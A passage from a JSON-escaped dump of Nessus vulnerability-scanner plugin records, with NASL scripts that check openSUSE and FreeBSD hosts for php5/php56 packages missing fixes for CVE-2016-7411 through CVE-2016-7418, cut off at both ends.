!~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-mod_php5-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"apache2-mod_php5-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-bcmath-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-bcmath-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-bz2-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-bz2-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-calendar-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-calendar-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-ctype-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-ctype-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-curl-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-curl-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-dba-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-dba-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-debugsource-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-devel-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-dom-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-dom-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-enchant-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-enchant-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-exif-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-exif-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-fastcgi-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-fastcgi-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-fileinfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-fileinfo-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-firebird-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-firebird-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-fpm-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-fpm-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-ftp-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-ftp-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-gd-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-gd-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-gettext-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-gettext-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-gmp-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-gmp-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-iconv-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-iconv-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-imap-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-imap-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-intl-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-intl-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-json-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-json-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-ldap-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-ldap-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-mbstring-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-mbstring-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-mcrypt-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-mcrypt-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-mssql-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-mssql-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-mysql-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-mysql-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-odbc-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-odbc-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-opcache-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-opcache-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-openssl-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-openssl-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pcntl-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pcntl-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pdo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pdo-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pear-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pgsql-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pgsql-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-phar-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-phar-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-posix-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-posix-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pspell-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-pspell-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-readline-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-readline-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-shmop-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-shmop-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-snmp-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-snmp-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-soap-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-soap-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sockets-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sockets-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sqlite-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sqlite-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-suhosin-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-suhosin-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sysvmsg-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sysvmsg-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sysvsem-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sysvsem-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sysvshm-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-sysvshm-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-tidy-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-tidy-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-tokenizer-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-tokenizer-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-wddx-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-wddx-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-xmlreader-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-xmlreader-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-xmlrpc-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-xmlrpc-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-xmlwriter-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-xmlwriter-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-xsl-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-xsl-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-zip-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-zip-debuginfo-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-zlib-5.5.14-62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"php5-zlib-debuginfo-5.5.14-62.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:26", "description": "PHP reports :\n\n- Fixed bug #73007 (add locale length check)\n\n- Fixed bug #72293 (Heap overflow in mysqlnd related to BIT fields)\n\n- Fixed bug #72928 (Out of bound when verify signature of zip phar in phar_parse_zipfile)\n\n- Fixed bug #73029 (Missing type check when unserializing SplArray)\n\n- Fixed bug #73052 (Memory Corruption in During Deserialized-object Destruction)\n\n- Fixed bug #72860 (wddx_deserialize use-after-free)\n\n- Fixed bug #73065 (Out-Of-Bounds Read in php_wddx_push_element)", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "nessus", "title": "FreeBSD : PHP -- multiple vulnerabilities (8d5180a6-86fe-11e6-8d93-00248c0c745d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php56", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_8D5180A686FE11E68D9300248C0C745D.NASL", "href": "https://www.tenable.com/plugins/nessus/94083", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94083);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"FreeBSD : PHP -- multiple vulnerabilities (8d5180a6-86fe-11e6-8d93-00248c0c745d)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP reports :\n\n- Fixed bug #73007 (add locale length check)\n\n- Fixed bug #72293 (Heap overflow in mysqlnd related to BIT fields)\n\n- Fixed bug #72928 (Out of bound when verify signature of zip phar in\nphar_parse_zipfile)\n\n- Fixed bug #73029 (Missing type check when unserializing SplArray)\n\n- Fixed bug #73052 (Memory Corruption in During Deserialized-object\nDestruction)\n\n- Fixed bug #72860 (wddx_deserialize use-after-free)\n\n- Fixed bug #73065 (Out-Of-Bounds Read in php_wddx_push_element)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.6.26\"\n );\n # https://vuxml.freebsd.org/freebsd/8d5180a6-86fe-11e6-8d93-00248c0c745d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1b5b60f9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php56<5.6.26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:14", "description": "This update for php5 fixes the following security issues :\n\n - CVE-2016-7411: Memory corruption when destructing deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing SplArray\n\n - CVE-2016-7418: NULL pointer dereference in php_wddx_push_element", "cvss3": {}, "published": "2016-10-05T00:00:00", "type": "nessus", "title": "openSUSE Security Update : php5 (openSUSE-2016-1150)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-fileinfo", "p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-firebird", "p-cpe:/a:novell:opensuse:php5-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-ldap", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-opcache", "p-cpe:/a:novell:opensuse:php5-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-1150.NASL", "href": "https://www.tenable.com/plugins/nessus/93853", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1150.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93853);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2016-1150)\");\n script_summary(english:\"Check for the openSUSE-2016-1150 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php5 fixes the following security issues :\n\n - CVE-2016-7411: Memory corruption when destructing\n deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not\n receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying\n signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in\n msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing\n SplArray\n\n - CVE-2016-7418: NULL pointer dereference in\n php_wddx_push_element\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 